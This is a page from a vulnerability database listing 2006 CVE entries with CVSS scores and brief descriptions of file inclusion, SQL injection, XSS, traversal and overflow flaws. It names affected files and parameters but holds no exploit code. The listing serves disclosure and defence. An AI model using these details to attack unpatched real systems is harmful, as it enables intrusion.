CVEdetails.com the ultimate security vulnerability data source
(e.g.: CVE-2009-1234 or 2010-1234 or 20101234)
Log In   Register
Vulnerability Feeds & WidgetsNew   www.itsecdb.com  

Security Vulnerabilities (CVSS score between 6 and 6.99)

Press ESC to close
# CVE ID CWE ID # of Exploits Vulnerability Type(s) Publish Date Update Date Score Gained Access Level Access Complexity Authentication Conf. Integ. Avail.
15251 CVE-2006-2682 Exec Code File Inclusion 2006-05-31 2017-10-18
6.4
None Remote Low Not required Partial Partial None
PHP remote file inclusion vulnerability in BE_config.php in Back-End CMS 0.7.2.1 and earlier allows remote attackers to execute arbitrary PHP code via a URL in the _PSL[classdir] parameter.
15252 CVE-2006-2681 94 Exec Code File Inclusion 2006-05-31 2017-07-19
6.8
None Remote Medium Not required Partial Partial Partial
PHP remote file inclusion vulnerability in SocketMail Lite and Pro 2.2.6 and earlier, when register_globals and magic_quotes are enabled, allows remote attackers to execute arbitrary PHP code via a URL in the site_path parameter to (1) index.php and (2) inc-common.php.
15253 CVE-2006-2673 XSS 2006-05-30 2018-10-18
6.8
User Remote Medium Not required Partial Partial Partial
Cross-site scripting (XSS) vulnerability in search.html in Bulletin Board Elite-Board (E-Board) 1.1 allows remote attackers to inject arbitrary web script or HTML via the search box.
15254 CVE-2006-2672 Sql XSS 2006-05-30 2018-10-18
6.8
User Remote Medium Not required Partial Partial Partial
Multiple cross-site scripting (XSS) vulnerabilities in Realty Pro One allow remote attackers to inject arbitrary web script or HTML via the (1) listingid parameter to (a) images.php, (b) index_other.php, or (c) request_info.php; (2) propertyid parameter to (d) searchlookup.php, (3) id parameter to (e) images.php, or (4) agentid parameter to (f) request_info.php. NOTE: some of these issues might be resultant from SQL injection.
15255 CVE-2006-2655 Bypass 2006-06-01 2017-07-19
6.4
None Remote Low Not required Partial Partial None
The build process for ypserv in FreeBSD 5.3 up to 6.1 accidentally disables access restrictions when using the /var/yp/securenets file, which allows remote attackers to bypass intended access restrictions.
15256 CVE-2006-2654 Dir. Trav. 2006-06-01 2017-07-19
6.4
None Remote Low Not required Partial Partial None
Directory traversal vulnerability in smbfs smbfs on FreeBSD 4.10 up to 6.1 allows local users to escape chroot restrictions for an SMB-mounted filesystem via "..\\" sequences. NOTE: this is similar to CVE-2006-1864, but this is a different implementation of smbfs, so it has a different CVE identifier.
15257 CVE-2006-2652 XSS 2006-05-30 2018-10-18
6.8
User Remote Medium Not required Partial Partial Partial
Cross-site scripting (XSS) vulnerability in WikiNi 0.4.2 and earlier allows remote attackers to inject arbitrary HTML and web script by editing a Wiki page to contain the script.
15258 CVE-2006-2649 79 XSS 2006-05-30 2017-07-19
6.8
User Remote Medium Not required Partial Partial Partial
Multiple cross-site scripting (XSS) vulnerabilities in (a) search.php, (b) search_cat.php, (c) search_price.php, and (d) product_details.php in the cosmicshop directory for CosmicShoppingCart allow remote attackers to inject arbitrary web script or HTML via multiple unspecified parameters, as demonstrated by the (1) query parameter in search.php and the (2) data parameter in search_cat.php.
15259 CVE-2006-2638 Exec Code Sql 2006-05-30 2018-10-18
6.4
None Remote Low Not required Partial Partial None
SQL injection vulnerability in member.asp in qjForum allows remote attackers to execute arbitrary SQL commands via the uName parameter.
15260 CVE-2006-2590 Exec Code Sql 2006-05-25 2008-09-05
6.4
None Remote Low Not required Partial Partial None
SQL injection vulnerability in e107 before 0.7.5 allows remote attackers to execute arbitrary SQL commands via unknown attack vectors.
15261 CVE-2006-2589 Exec Code Sql 2006-05-25 2018-10-18
6.4
None Remote Low Not required Partial Partial None
SQL injection vulnerability in rss.php in MyBB (aka MyBulletinBoard) 1.1.1 allows remote attackers to execute arbitrary SQL commands via the comma parameter. NOTE: it is not clear from the original report how this attack can succeed, since the demonstration URL uses a variable that is overwritten with static data in the extracted source code.
15262 CVE-2006-2585 Exec Code Sql 2006-05-25 2017-07-19
6.4
None Remote Low Not required Partial Partial None
SQL injection vulnerability in Destiney Links Script 2.1.2 allows remote attackers to execute arbitrary SQL commands via the ID parameter. NOTE: the provenance of this information is unknown; the details are obtained solely from third party information.
15263 CVE-2006-2557 Exec Code File Inclusion 2006-05-23 2017-10-18
6.4
None Remote Low Not required Partial Partial None
PHP remote file inclusion vulnerability in extras/poll/poll.php in Florian Amrhein NewsPortal before 0.37, and TR Newsportal (TRanx rebuilded), allows remote attackers to execute arbitrary PHP code via a URL in the file_newsportal parameter.
15264 CVE-2006-2554 Exec Code Overflow 2006-05-23 2018-10-18
6.4
None Remote Low Not required Partial Partial None
Buffer overflow in the tell_player_surr_changes function in Genecys 0.2 and earlier might allow remote attackers to execute arbitrary code via long arguments.
15265 CVE-2006-2532 Sql 2006-05-22 2018-10-18
6.4
None Remote Low Not required Partial Partial None
stats.php in Destiney Rated Images Script 0.5.0 allows remote attackers to obtain the installation path via an invalid s parameter, which displays the path in an error message. NOTE: this issue was originally claimed to be SQL injection, but CVE analysis shows that the problem is related to an invalid value that prevents some variables from being set.
15266 CVE-2006-2528 Exec Code File Inclusion 2006-05-22 2017-07-19
6.4
None Remote Low Not required Partial Partial None
PHP remote file inclusion vulnerability in classified_right.php in phpBazar 2.1.0 and earlier allows remote attackers to execute arbitrary PHP code via a URL in the language_dir parameter.
15267 CVE-2006-2526 Exec Code File Inclusion 2006-05-22 2018-10-18
6.4
None Remote Low Not required Partial Partial None
PHP remote file inclusion vulnerability in index.php in PHP Easy Galerie 1.1 allows remote attackers to execute arbitrary PHP code via a URL in the includepath parameter.
15268 CVE-2006-2525 Exec Code Sql 2006-05-22 2017-07-19
6.4
None Remote Low Not required Partial Partial None
SQL injection vulnerability in UseBB 1.0 RC1 and earlier allows remote attackers to execute arbitrary SQL commands via the member list search module.
15269 CVE-2006-2524 XSS 2006-05-22 2017-07-19
6.8
None Remote Medium Not required Partial Partial Partial
Cross-site scripting (XSS) vulnerability in UseBB 1.0 RC1 and earlier allows remote attackers to inject arbitrary web script or HTML via unspecified vectors when processing the user date format.
15270 CVE-2006-2515 XSS 2006-05-22 2018-10-18
6.8
User Remote Medium Not required Partial Partial Partial
Cross-site scripting (XSS) vulnerability in index.php in Hiox Guestbook 3.1 allows remote attackers to inject arbitrary web script or HTML via the input forms for signing the guestbook.
15271 CVE-2006-2512 Exec Code Sql 2006-05-22 2017-07-19
6.5
User Remote Low Single system Partial Partial Partial
SQL injection vulnerability in Hitachi EUR Professional Edition, EUR Viewer, EUR Print Service, and EUR Print Service for ILF allows remote authenticated users to execute arbitrary SQL commands via unknown attack vectors.
15272 CVE-2006-2511 2006-05-22 2018-10-18
6.5
User Remote Low Single system Partial Partial Partial
The ActiveX version of FrontRange iHEAT allows remote authenticated users to run arbitrary programs or access arbitrary files on the host machine by uploading a file with an extension that is not associated with an application, and selecting a file from the "Open With..." dialog.
15273 CVE-2006-2510 XSS 2006-05-22 2018-10-18
6.8
User Remote Medium Not required Partial Partial Partial
Cross-site scripting (XSS) vulnerability in the URL submission form in YourFreeWorld.com Short Url & Url Tracker Script allows remote attackers to inject arbitrary web script or HTML via an unspecified form for submitting URLs.
15274 CVE-2006-2508 Exec Code Sql 2006-05-22 2018-10-18
6.4
None Remote Low Not required None Partial Partial
SQL injection vulnerability in tr1.php in YourFreeWorld.com Stylish Text Ads Script allows remote attackers to execute arbitrary SQL commands via the id parameter, possibly involving an attack vector using advertise.php.
15275 CVE-2006-2506 79 XSS 2006-05-22 2018-10-18
6.8
User Remote Medium Not required Partial Partial Partial
Multiple cross-site scripting (XSS) vulnerabilities in search.php in Sphider allow remote attackers to inject arbitrary web script or HTML via (1) the PATH_INFO and (2) the category parameter.
15276 CVE-2006-2501 XSS 2006-05-19 2017-07-19
6.8
User Remote Medium Not required Partial Partial Partial
Cross-site scripting (XSS) vulnerability in Sun ONE Web Server 6.0 SP9 and earlier, Java System Web Server 6.1 SP4 and earlier, Sun ONE Application Server 7 Platform and Standard Edition Update 6 and earlier, and Java System Application Server 7 2004Q2 Standard and Enterprise Edition Update 2 and earlier, allows remote attackers to inject arbitrary web script or HTML via unknown attack vectors, possibly involving error messages.
15277 CVE-2006-2500 XSS 2006-05-19 2018-10-18
6.8
User Remote Medium Not required Partial Partial Partial
Cross-site scripting (XSS) vulnerability in add_news.asp in CodeAvalanche News (CANews) 1.2 allows remote attackers to inject arbitrary web script or HTML via the Headline field. NOTE: if this issue is limited to administrators, and if it is expected behavior for administrators to be able to generate HTML, then this is not a vulnerability.
15278 CVE-2006-2498 2006-05-19 2017-07-19
6.4
None Remote Low Not required Partial Partial None
Invision Power Board (IPB) before 2.1.6 allows remote attackers to execute arbitrary PHP script via attack vectors involving (1) the post_icon variable in classes/post/class_post.php and (2) the df value in action_public/moderate.php.
15279 CVE-2006-2491 XSS 2006-05-19 2018-10-18
6.8
User Remote Medium Not required Partial Partial Partial
Cross-site scripting (XSS) vulnerability in (1) index.php and (2) bmc/admin.php in BoastMachine (bMachine) 3.1 and earlier allows remote attackers to inject arbitrary web script or HTML via the query string, which is not properly filtered when it is accessed using the $_SERVER["PHP_SELF"] variable.
15280 CVE-2006-2486 Exec Code Sql 2006-05-19 2018-10-18
6.4
None Remote Low Not required Partial Partial None
SQL injection vulnerability in find.php in YapBB 1.2 Beta2 and earlier allows remote attackers to execute arbitrary SQL commands via the userID parameter.
15281 CVE-2006-2483 Exec Code File Inclusion 2006-05-19 2017-10-18
6.4
None Remote Low Not required Partial Partial None
PHP remote file inclusion vulnerability in cart_content.php in Squirrelcart 2.2.2 and earlier allows remote attackers to execute arbitrary PHP code via a URL in the cart_isp_root parameter.
15282 CVE-2006-2482 119 Exec Code Overflow 2006-09-08 2017-07-19
6.8
User Remote Medium Not required Partial Partial Partial
Heap-based buffer overflow in the TZipTV component in (1) ZipTV for Delphi 7 2006.1.26 and for C++ Builder 2006-1.16, (2) PentaZip 8.5.1.190 and PentaSuite-PRO 8.5.1.221, and possibly other products, allows user-assisted attackers to execute arbitrary code via an ARJ archive with a long header. NOTE: the ACE archive vector is covered by CVE-2005-2856.
15283 CVE-2006-2460 Dir. Trav. File Inclusion 2006-05-19 2018-10-18
6.4
None Remote Low Not required Partial Partial None
Sugar Suite Open Source (SugarCRM) 4.2 and earlier, when register_globals is enabled, does not protect critical variables such as $_GLOBALS and $_SESSION from modification, which allows remote attackers to conduct attacks such as directory traversal or PHP remote file inclusion, as demonstrated by modifying the GLOBALS[sugarEntry] parameter.
15284 CVE-2006-2459 Exec Code Sql 2006-05-19 2018-10-18
6.4
None Remote Low Not required Partial Partial None
SQL injection vulnerability in messages.php in PHP-Fusion 6.00.307 and earlier allows remote authenticated users to execute arbitrary SQL commands via the srch_where parameter.
15285 CVE-2006-2435 2006-05-17 2009-06-17
6.4
None Remote Low Not required Partial Partial None
Unspecified vulnerability in IBM WebSphere Application Server 5.0.2 and earlier, and 5.1.1 and earlier, has unknown impact and attack vectors related to "Inserting certain script tags in urls [that] may allow unintended execution of scripts."
15286 CVE-2006-2428 Exec Code Bypass 2006-05-17 2018-10-18
6.4
None Remote Low Not required Partial Partial None
add.asp in DUware DUbanner 3.1 allows remote attackers to execute arbitrary code by uploading files with arbitrary extensions, such as ASP files, probably due to client-side enforcement that can be bypassed. NOTE: some of these details are obtained from third party information, since the raw source is vague.
15287 CVE-2006-2426 DoS 2006-05-17 2018-10-18
6.4
None Remote Low Not required None Partial Partial
Sun Java Runtime Environment (JRE) 1.5.0_6 and earlier, JDK 1.5.0_6 and earlier, and SDK 1.5.0_6 and earlier allows remote attackers to cause a denial of service (disk consumption) by using the Font.createFont function to create temporary files of arbitrary size in the %temp% directory.
15288 CVE-2006-2418 XSS 2006-05-16 2017-07-19
6.8
User Remote Medium Not required Partial Partial Partial
Cross-site scripting (XSS) vulnerabilities in certain versions of phpMyAdmin before 2.8.0.4 allow remote attackers to inject arbitrary web script or HTML via the db parameter in unknown scripts.
15289 CVE-2006-2405 Dir. Trav. 2006-05-16 2018-10-18
6.8
User Remote Medium Not required Partial Partial Partial
Directory traversal vulnerability in unb_lib/abbc.conf.php in Unclassified NewsBoard (UNB) 1.6.1 patch 1 and earlier, when register_globals is enabled, allows remote attackers to include arbitrary files via .. (dot dot) sequences and a trailing null byte (%00) in the ABBC[Config][smileset] parameter to unb_lib/abbc.css.php.
15290 CVE-2006-2404 Dir. Trav. 2006-05-15 2018-10-18
6.4
None Remote Low Not required Partial Partial None
Directory traversal vulnerability in popup.php in RadScripts RadLance Gold 7.0 allows remote attackers to read arbitrary files via a .. (dot dot) in the read parameter.
15291 CVE-2006-2392 Exec Code File Inclusion 2006-05-15 2017-10-18
6.4
None Remote Low Not required Partial Partial None
PHP remote file inclusion vulnerability in public_includes/pub_popup/popup_finduser.php in PHP Blue Dragon Platinum 2.8.0 allows remote attackers to execute arbitrary PHP code via a URL in the vsDragonRootPath parameter.
15292 CVE-2006-2386 Exec Code 2006-12-12 2018-10-18
6.8
User Remote Medium Not required Partial Partial Partial
Unspecified vulnerability in Microsoft Outlook Express 6 and earlier allows remote attackers to execute arbitrary code via a crafted contact record in a Windows Address Book (WAB) file.
15293 CVE-2006-2378 Exec Code Overflow 2006-06-13 2018-10-12
6.8
User Remote Medium Not required Partial Partial Partial
Buffer overflow in the ART Image Rendering component (jgdw400.dll) in Microsoft Windows XP SP1 and Sp2, Server 2003 SP1 and earlier, and Windows 98 and Me allows remote attackers to execute arbitrary code via a crafted ART image that causes heap corruption.
15294 CVE-2006-2349 Exec Code XSS 2006-05-12 2018-10-18
6.8
User Remote Medium Not required Partial Partial Partial
E-Business Designer (eBD) 3.1.4 and earlier allows remote attackers to upload or modify arbitrary files, and execute arbitrary code, via a direct request to (1) common/html_editor/image_browser.upload.html, (2) common/html_editor/image_browser.html, or (3) common/html_editor/html_editor.html. NOTE: this can also be used for cross-site scripting (XSS) attacks by uploading cascading style sheet (.CSS) files.
15295 CVE-2006-2344 Exec Code Sql 2006-05-12 2017-07-19
6.4
None Remote Low Not required Partial Partial None
SQL injection vulnerability in inc/elementz.php in AliPAGER 1.5, with magic_quotes_gpc disabled, allows remote attackers to execute arbitrary SQL commands via the ubild parameter.
15296 CVE-2006-2339 Exec Code Sql 2006-05-11 2017-07-19
6.4
None Remote Low Not required Partial Partial None
SQL injection vulnerability in index.php in evoTopsites 2.x and evoTopsites Pro 2.x allows remote attackers to execute arbitrary SQL commands via the (1) cat_id and (2) id parameters.
15297 CVE-2006-2336 Exec Code Sql 2006-05-11 2018-10-18
6.4
None Remote Low Not required Partial Partial None
SQL injection vulnerability in showthread.php in MyBB (aka MyBulletinBoard) 1.1.1 allows remote attackers to execute arbitrary SQL commands via the comma parameter.
15298 CVE-2006-2335 Exec Code 2006-05-11 2018-10-18
6.5
User Remote Low Single system Partial Partial Partial
Jelsoft vBulletin accepts uploads of Cascading Style Sheets (CSS) and processes them in a way that allows remote authenticated administrators to gain shell access by uploading a CSS file that contains PHP code, then selecting the file via the style chooser, which causes the PHP code to be executed. NOTE: the vendor was unable to reproduce this issue in 3.5.x. NOTE: this issue might be due to direct static code injection.
15299 CVE-2006-2333 Exec Code Sql 2006-05-11 2018-10-18
6.4
None Remote Low Not required Partial Partial None
Multiple SQL injection vulnerabilities in MyBB (aka MyBulletinBoard) 1.1.1 allow remote attackers to execute arbitrary SQL commands via the e-mail address when registering for a forum that requires e-mail verification, which is not properly handled in (1) usercp.php and (2) member.php.
15300 CVE-2006-2331 Dir. Trav. 2006-05-11 2018-10-18
6.4
None Remote Low Not required Partial Partial None
Multiple directory traversal vulnerabilities in PHP-Fusion 6.00.306 allow remote attackers to include and execute arbitrary local files via (1) a .. (dot dot) in the settings[locale] parameter in infusions/last_seen_users_panel/last_seen_users_panel.php, and (2) a .. (dot dot) in the localeset parameter in setup.php. NOTE: the vendor states that this issue might exist due to problems in third party local files.
CVE is a registred trademark of the MITRE Corporation and the authoritative source of CVE content is MITRE's CVE web site. CWE is a registred trademark of the MITRE Corporation and the authoritative source of CWE content is MITRE's CWE web site. OVAL is a registered trademark of The MITRE Corporation and the authoritative source of OVAL content is MITRE's OVAL web site.
Use of this information constitutes acceptance for use in an AS IS condition. There are NO warranties, implied or otherwise, with regard to this information or its use. Any use of this information is at the user's risk. It is the responsibility of user to evaluate the accuracy, completeness or usefulness of any information, opinion, advice or other content. EACH USER WILL BE SOLELY RESPONSIBLE FOR ANY consequences of his or her direct or indirect use of this web site. ALL WARRANTIES OF ANY KIND ARE EXPRESSLY DISCLAIMED. This site will NOT BE LIABLE FOR ANY DIRECT, INDIRECT or any other kind of loss.